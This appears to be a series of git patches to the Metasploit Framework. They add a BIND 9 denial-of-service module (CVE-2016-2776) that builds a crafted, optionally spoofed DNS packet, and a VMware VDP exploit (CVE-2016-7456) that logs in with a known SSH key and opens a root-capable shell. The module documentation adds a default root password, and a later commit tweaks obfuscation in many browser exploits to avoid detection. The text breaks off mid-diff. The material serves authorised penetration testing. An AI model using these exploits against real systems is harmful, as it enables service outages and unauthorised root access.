From 143a4af73de8e916de8c125ca132be43e9c3c5a3 Mon Sep 17 00:00:00 2001 From: Ale Date: Thu, 29 Sep 2016 22:14:13 -0300 Subject: [PATCH 001/883] DoS exploit for CVE-2016-2776 --- modules/auxiliary/dos/dns/namedown.rb | 166 ++++++++++++++++++++++++++ 1 file changed, 166 insertions(+) create mode 100755 modules/auxiliary/dos/dns/namedown.rb diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb new file mode 100755 index 0000000000..924eb8de83 --- /dev/null +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -0,0 +1,166 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'timeout' +require 'socket' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Capture + include Msf::Auxiliary::UDPScanner + include Msf::Auxiliary::Dos + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => 'BIND 9 DoS CVE-2016-2776', + 'Description' => %q{ + Denial of Service Bind 9 DNS Server CVE-2016-2776. + Critical error condition which can occur when a nameserver is constructing a response. + A defect in the rendering of messages into packets can cause named to exit with an + assertion failure in buffer.c while constructing a response to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address isnt allowed + to make queries. + }, + # Research and Original PoC - msf module author + 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-2776' ], + [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] + ], + 'DisclosureDate' => '2016-09-27' + )) + + register_options([ + Opt::RPORT(53), + OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) + ]) + + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') + end + + def scanner_prescan(batch) + puts ''' + .... + ,.... + ..........7 + 7...............7 + ........ 7.. + .I I. + ., + ~...., 7.. I. + .................... + ......................7 + ........................I + ........................ + .......................... + .......................... + =........................... + ............................ + ............................ + +.........................., + ..........................7 + :......................... + ........................ + +...................., + 7..................7 + 7~............:7 + 7+,,+777 + ''' + datastore['ScannerRecvWindow'] = 0 + end + + def checkServerStatus(ip, rport) + res = "" + sudp = UDPSocket.new + sudp.send(validQuery, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end + + if(res.length==0) + print_good("Exploit Success (Maybe, nameserver did not replied)") + else + print_error("Exploit Failed") + end + end + + def scan_host(ip) + @flag_success = true + print_status("Sending bombita (Specially crafted udp packet) to: "+ip) + scanner_send(payload, ip, rport) + checkServerStatus(ip, rport) + end + + def getDomain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + getDomain = domain+org + end + + def payload + + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x01" # Additional RRs: 1 + + # Doman Name + query += getDomain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001) + + # Aditional records. Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes + query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) + query += "\x00" + + query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) + query += "\x00\xff" # Class: ANY (0x00ff) + query += "\x00\x00\x00\x00" # Time to live: 0 + query += "\x00\xfc" # Data length: 252 + + # Algorithm Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes + query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes + query += "\x00" + + # Rest of TSIG + query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART + query += "\x01\x2c" # Fudge: 300 + query += "\x00\x10" # MAC Size: 16 + query += Rex::Text.rand_text_alphanumeric(16) # MAC + query += "\x8f\x65" # Original Id: 36709 + query += "\x00\x00" # Error: No error (0) + query += "\x00\x00" # Other len: 0 + end + + def validQuery + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x00" # Additional RRs: 0 + + # Doman Name + query += getDomain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001)s + end + +end + From c699c7c5064c6d9bc7a25c27a2abf2998a479296 Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 13:42:30 -0300 Subject: [PATCH 002/883] Fixing MSF Code Style --- modules/auxiliary/dos/dns/namedown.rb | 71 ++++++++------------------- 1 file changed, 21 insertions(+), 50 deletions(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 924eb8de83..1ac4ca0026 100755 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -34,7 +34,10 @@ class MetasploitModule < Msf::Auxiliary [ 'CVE', '2016-2776' ], [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] ], - 'DisclosureDate' => '2016-09-27' + 'DisclosureDate' => 'Sep 27 2016', + { + 'ScannerRecvWindow' => 0 + } )) register_options([ @@ -45,70 +48,38 @@ class MetasploitModule < Msf::Auxiliary deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end - def scanner_prescan(batch) - puts ''' - .... - ,.... - ..........7 - 7...............7 - ........ 7.. - .I I. - ., - ~...., 7.. I. - .................... - ......................7 - ........................I - ........................ - .......................... - .......................... - =........................... - ............................ - ............................ - +.........................., - ..........................7 - :......................... - ........................ - +...................., - 7..................7 - 7~............:7 - 7+,,+777 - ''' - datastore['ScannerRecvWindow'] = 0 - end - def checkServerStatus(ip, rport) res = "" sudp = UDPSocket.new - sudp.send(validQuery, 0, ip, rport) - begin - Timeout.timeout(5) do - res = sudp.recv(100) - end - rescue Timeout::Error - end + sudp.send(validQuery, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end - if(res.length==0) - print_good("Exploit Success (Maybe, nameserver did not replied)") - else - print_error("Exploit Failed") - end + if(res.length==0) + print_good("Exploit Success (Maybe, nameserver did not replied)") + else + print_error("Exploit Failed") + end end def scan_host(ip) @flag_success = true print_status("Sending bombita (Specially crafted udp packet) to: "+ip) scanner_send(payload, ip, rport) - checkServerStatus(ip, rport) + checkServerStatus(ip, rport) end def getDomain - domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) - org = "\x03"+Rex::Text.rand_text_alphanumeric(3) - getDomain = domain+org + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + getDomain = domain+org end def payload - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # Questions: 1 @@ -125,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary # Aditional records. Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) - query += "\x00" + query += "\x00" query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) query += "\x00\xff" # Class: ANY (0x00ff) From bd96380d1904944289921efa5b8815b1ab8cf8bc Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 13:50:58 -0300 Subject: [PATCH 003/883] Fix in ScannerRecvWindow Declaration --- modules/auxiliary/dos/dns/namedown.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 1ac4ca0026..3ec6dff519 100755 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -35,9 +35,7 @@ class MetasploitModule < Msf::Auxiliary [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', - { - 'ScannerRecvWindow' => 0 - } + 'DefaultOptions' => {'ScannerRecvWindow' => 0} )) register_options([ From 066df5f1a96acda16fc285c3c52528604d749b8c Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 14:19:43 -0300 Subject: [PATCH 004/883] Fix msftidy warnings --- modules/auxiliary/dos/dns/namedown.rb | 64 +++++++++++++-------------- 1 file changed, 32 insertions(+), 32 deletions(-) mode change 100755 => 100644 modules/auxiliary/dos/dns/namedown.rb diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb old mode 100755 new mode 100644 index 3ec6dff519..4064407d42 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -8,12 +8,12 @@ require 'timeout' require 'socket' class MetasploitModule < Msf::Auxiliary - + include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Dos include Msf::Auxiliary::Report - + def initialize(info={}) super(update_info(info, 'Name' => 'BIND 9 DoS CVE-2016-2776', @@ -21,13 +21,13 @@ class MetasploitModule < Msf::Auxiliary Denial of Service Bind 9 DNS Server CVE-2016-2776. Critical error condition which can occur when a nameserver is constructing a response. A defect in the rendering of messages into packets can cause named to exit with an - assertion failure in buffer.c while constructing a response to a query that meets certain criteria. - - This assertion can be triggered even if the apparent source address isnt allowed + assertion failure in buffer.c while constructing a response to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address isnt allowed to make queries. }, # Research and Original PoC - msf module author - 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], + 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], 'License' => MSF_LICENSE, 'References' => [ @@ -42,22 +42,22 @@ class MetasploitModule < Msf::Auxiliary Opt::RPORT(53), OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) ]) - + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end - def checkServerStatus(ip, rport) - res = "" - sudp = UDPSocket.new - sudp.send(validQuery, 0, ip, rport) - begin - Timeout.timeout(5) do - res = sudp.recv(100) - end - rescue Timeout::Error - end + def check_server_status(ip, rport) + res = "" + sudp = UDPSocket.new + sudp.send(valid_query, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end - if(res.length==0) + if(res.length==0) print_good("Exploit Success (Maybe, nameserver did not replied)") else print_error("Exploit Failed") @@ -65,16 +65,16 @@ class MetasploitModule < Msf::Auxiliary end def scan_host(ip) - @flag_success = true - print_status("Sending bombita (Specially crafted udp packet) to: "+ip) - scanner_send(payload, ip, rport) - checkServerStatus(ip, rport) + @flag_success = true + print_status("Sending bombita (Specially crafted udp packet) to: "+ip) + scanner_send(payload, ip, rport) + check_server_status(ip, rport) end - def getDomain - domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) - org = "\x03"+Rex::Text.rand_text_alphanumeric(3) - getDomain = domain+org + def get_domain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + get_domain = domain+org end def payload @@ -86,15 +86,15 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x01" # Additional RRs: 1 # Doman Name - query += getDomain # Random DNS Name + query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001) - + # Aditional records. Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) - query += "\x00" + query += "\x00" query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) query += "\x00\xff" # Class: ANY (0x00ff) @@ -116,8 +116,8 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x00" # Other len: 0 end - def validQuery - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + def valid_query + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # Questions: 1 query += "\x00\x00" # Answer RRs: 0 @@ -125,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x00" # Additional RRs: 0 # Doman Name - query += getDomain # Random DNS Name + query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001)s From c4c133dff835e9baeed20110e726ee2bd8ccfc92 Mon Sep 17 00:00:00 2001 From: Ale Date: Mon, 3 Oct 2016 17:11:04 -0300 Subject: [PATCH 005/883] Fix Web URL --- modules/auxiliary/dos/dns/namedown.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 4064407d42..2a8e2b521c 100644 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ [ 'CVE', '2016-2776' ], - [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] + [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', 'DefaultOptions' => {'ScannerRecvWindow' => 0} From 589084896a4a8bf23197680520f5f41d30947e8f Mon Sep 17 00:00:00 2001 From: phroxvs Date: Tue, 3 Jan 2017 03:36:49 -0500 Subject: [PATCH 006/883] initial version of CVE-2016-7456 exploit --- .../linux/ssh/vmware_vdp_known_privkey.rb | 167 ++++++++++++++++++ 1 file changed, 167 insertions(+) create mode 100644 modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb new file mode 100644 index 0000000000..a0c2a5de1c --- /dev/null +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -0,0 +1,167 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::SSH + + def initialize(info = {}) + super(update_info(info, { + 'Name' => 'VMware VDP known SSH Key', + 'Description' => %q{ + VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ "Universal", {} ] ], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'Author' => ['phroxvs'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-7456' ], + [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], + ], + 'DisclosureDate' => "Dec 20 2016", + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0 + })) + + register_options( + [ + # Since we don't include Tcp, we have to register this manually + Opt::RHOST(), + Opt::RPORT(22) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + + end + + # helper methods that normally come from Tcp + def rhost + datastore['RHOST'] + end + def rport + datastore['RPORT'] + end + + def do_login() + factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies']) + opt_hash = { + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ], + use_agent: false, + config: false, + proxy: factory, + non_interactive: true + } + opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + begin + ssh_socket = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh_socket = Net::SSH.start(rhost, 'admin', opt_hash) + end + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh_socket + + # Create a new session from the socket, then dump it. + conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + self.sockets.delete(ssh_socket.transport.socket) + + return conn + else + return false + end + end + + def exploit + conn = do_login() + if conn + print_good "Successful login" + + service_data = { + address: rhost, + port: rport, + protocol: 'tcp', + service_name: 'ssh', + workspace_id: myworkspace_id, + } + credential_data = { + username: 'admin', + private_type: :ssh_key, + private_data: key_data, + origin_type: :service, + module_fullname: fullname, + }.merge(service_data) + + core = create_credential(credential_data) + login_data = { + core: core, + last_attempted: Time.now, + }.merge(service_data) + + create_credential_login(login_data) + + handler(conn.lsock) + end + end + + def key_data + < Date: Tue, 3 Jan 2017 03:39:22 -0500 Subject: [PATCH 007/883] initial version of CVE-2016-7456 exploit --- modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index a0c2a5de1c..3bb5a3dd05 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, { - 'Name' => 'VMware VDP known SSH Key', + 'Name' => 'VMware VDP Known SSH Key', 'Description' => %q{ VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. }, @@ -34,8 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2016-7456' ], - [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], + [ 'CVE', '2016-7456' ], + [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], ], 'DisclosureDate' => "Dec 20 2016", 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, @@ -115,8 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote conn = do_login() if conn print_good "Successful login" - - service_data = { + service_data = { address: rhost, port: rport, protocol: 'tcp', @@ -138,7 +137,6 @@ class MetasploitModule < Msf::Exploit::Remote }.merge(service_data) create_credential_login(login_data) - handler(conn.lsock) end end From a9a83bc21c76483895b53a70e158f850bd958c43 Mon Sep 17 00:00:00 2001 From: phroxvs Date: Tue, 3 Jan 2017 06:16:07 -0500 Subject: [PATCH 008/883] fix for uninitialized constant in Net::SSH on OS X --- modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index 3bb5a3dd05..956478eadb 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -5,12 +5,13 @@ require 'msf/core' require 'net/ssh' - +require 'net/ssh/command_stream' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report + include Msf::Auxiliary::CommandShell include Msf::Exploit::Remote::SSH def initialize(info = {}) From a3ad3803dfc78003e7f37c155e87ebee3d9fdc59 Mon Sep 17 00:00:00 2001 From: phroxvs Date: Tue, 3 Jan 2017 06:49:50 -0500 Subject: [PATCH 009/883] added module documentation --- .../linux/ssh/vmware_vdp_known_privkey.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md diff --git a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md new file mode 100644 index 0000000000..92a291bf42 --- /dev/null +++ b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md @@ -0,0 +1,27 @@ +## Vulnerable Application + + VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. + +## Verification Steps + + 1. Start msfconsole + 2. Do: `use exploit/linux/ssh/vmware_vdp_known_privkey` + 3. Do: `set rhost 1.2.3.4` + 4. Do: `exploit` + 5. You should get a shell. + 6. Type: `sudo -s` to become root user + +## Scenarios + +This is a run against a known vulnerable vSphere Data Protection appliance. + +``` +msf > use exploit/linux/ssh/vmware_vdp_known_privkey +msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4 +rhost => 1.2.3.4 +msf exploit(exagrid_known_privkey) > run + +[+] Successful login +[*] Found shell. +[*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100 +``` From 245a7deb67013126a44b405c7d01ce9e85500111 Mon Sep 17 00:00:00 2001 From: phroxvs Date: Tue, 3 Jan 2017 06:51:50 -0500 Subject: [PATCH 010/883] correct copy&paste mistake in module documentation --- .../modules/exploit/linux/ssh/vmware_vdp_known_privkey.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md index 92a291bf42..3902bee5d4 100644 --- a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md +++ b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md @@ -19,7 +19,7 @@ This is a run against a known vulnerable vSphere Data Protection appliance. msf > use exploit/linux/ssh/vmware_vdp_known_privkey msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4 rhost => 1.2.3.4 -msf exploit(exagrid_known_privkey) > run +msf exploit(vmware_vdp_known_privkey) > run [+] Successful login [*] Found shell. From 1a4c239120ae4189cae0f4d90e24c7a2cfb32117 Mon Sep 17 00:00:00 2001 From: phroxvs Date: Tue, 3 Jan 2017 12:51:27 -0500 Subject: [PATCH 011/883] added default password of root account to documentation --- .../modules/exploit/linux/ssh/vmware_vdp_known_privkey.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md index 3902bee5d4..a464e173d8 100644 --- a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md +++ b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md @@ -25,3 +25,7 @@ msf exploit(vmware_vdp_known_privkey) > run [*] Found shell. [*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100 ``` + +## Further Information + +The default account of the appliance is root:changeme From 8ce10ac5916efa3f1bcd1a983ed1ad275ccefa3a Mon Sep 17 00:00:00 2001 From: Jeff Tang Date: Wed, 22 Feb 2017 14:13:18 -0500 Subject: [PATCH 012/883] Avoid String.fromCharCode which gets detected --- modules/exploits/windows/browser/adobe_flash_rtmp.rb | 2 +- modules/exploits/windows/browser/adobe_flash_sps.rb | 2 +- .../exploits/windows/browser/adobe_flashplayer_flash10o.rb | 2 +- .../exploits/windows/browser/aladdin_choosefilepath_bof.rb | 2 +- .../exploits/windows/browser/apple_quicktime_mime_type.rb | 2 +- .../windows/browser/apple_quicktime_texml_font_table.rb | 2 +- modules/exploits/windows/browser/asus_net4switch_ipswcom.rb | 2 +- .../windows/browser/athocgov_completeinstallation.rb | 2 +- .../windows/browser/baofeng_storm_onbeforevideodownload.rb | 2 +- modules/exploits/windows/browser/chilkat_crypt_writefile.rb | 2 +- modules/exploits/windows/browser/cisco_anyconnect_exec.rb | 2 +- .../exploits/windows/browser/cisco_playerpt_setsource.rb | 2 +- .../windows/browser/cisco_playerpt_setsource_surl.rb | 2 +- modules/exploits/windows/browser/citrix_gateway_actx.rb | 2 +- .../windows/browser/crystal_reports_printcontrol.rb | 2 +- modules/exploits/windows/browser/ea_checkrequirements.rb | 2 +- modules/exploits/windows/browser/honeywell_tema_exec.rb | 2 +- .../windows/browser/hp_alm_xgo_setshapenodetype_exec.rb | 2 +- .../windows/browser/hp_loadrunner_writefilebinary.rb | 2 +- modules/exploits/windows/browser/ibm_spss_c1sizer.rb | 2 +- .../exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb | 2 +- modules/exploits/windows/browser/ibmegath_getxmlvalue.rb | 2 +- modules/exploits/windows/browser/ie_execcommand_uaf.rb | 2 +- .../windows/browser/imgeviewer_tifmergemultifiles.rb | 2 +- .../browser/indusoft_issymbol_internationalseparator.rb | 2 +- modules/exploits/windows/browser/inotes_dwa85w_bof.rb | 2 +- modules/exploits/windows/browser/intrust_annotatex_add.rb | 2 +- modules/exploits/windows/browser/mcafee_mvt_exec.rb | 2 +- .../exploits/windows/browser/mozilla_interleaved_write.rb | 2 +- modules/exploits/windows/browser/mozilla_reduceright.rb | 4 ++-- modules/exploits/windows/browser/ms05_054_onload.rb | 4 ++-- modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb | 2 +- modules/exploits/windows/browser/ms10_018_ie_behaviors.rb | 2 +- modules/exploits/windows/browser/ms10_090_ie_css_clip.rb | 2 +- .../windows/browser/ms11_050_mshtml_cobjectelement.rb | 2 +- modules/exploits/windows/browser/ms11_081_option.rb | 2 +- modules/exploits/windows/browser/ms11_093_ole32.rb | 2 +- modules/exploits/windows/browser/ms12_004_midi.rb | 4 ++-- modules/exploits/windows/browser/ms12_037_ie_colspan.rb | 2 +- modules/exploits/windows/browser/ms12_037_same_id.rb | 2 +- .../exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb | 2 +- modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb | 6 +++--- modules/exploits/windows/browser/mswhale_checkforupdates.rb | 2 +- .../windows/browser/msxml_get_definition_code_exec.rb | 2 +- modules/exploits/windows/browser/nis2004_antispam.rb | 2 +- modules/exploits/windows/browser/notes_handler_cmdinject.rb | 2 +- .../windows/browser/novell_groupwise_gwcls1_actvx.rb | 2 +- modules/exploits/windows/browser/ntr_activex_check_bof.rb | 2 +- modules/exploits/windows/browser/ntr_activex_stopmodule.rb | 2 +- .../windows/browser/oracle_autovue_setmarkupmode.rb | 2 +- .../exploits/windows/browser/oracle_dc_submittoexpress.rb | 2 +- modules/exploits/windows/browser/pcvue_func.rb | 2 +- modules/exploits/windows/browser/quickr_qp2_bof.rb | 2 +- modules/exploits/windows/browser/realplayer_qcp.rb | 2 +- .../windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb | 2 +- .../windows/browser/samsung_security_manager_put.rb | 6 +++--- .../windows/browser/siemens_solid_edge_selistctrlx.rb | 2 +- .../windows/browser/symantec_altirisdeployment_runcmd.rb | 2 +- modules/exploits/windows/browser/teechart_pro.rb | 2 +- .../exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb | 2 +- modules/exploits/windows/browser/ultraoffice_httpupload.rb | 2 +- .../exploits/windows/browser/viscom_movieplayer_drawtext.rb | 2 +- modules/exploits/windows/browser/vlc_amv.rb | 2 +- modules/exploits/windows/browser/vlc_mms_bof.rb | 2 +- modules/exploits/windows/browser/webex_ucf_newobject.rb | 2 +- .../exploits/windows/browser/zenworks_helplauncher_exec.rb | 2 +- 66 files changed, 73 insertions(+), 73 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb index 84bc9cf971..894453c795 100644 --- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb +++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb @@ -372,7 +372,7 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index b2d3ce686c..47e4357b4a 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end myhost = 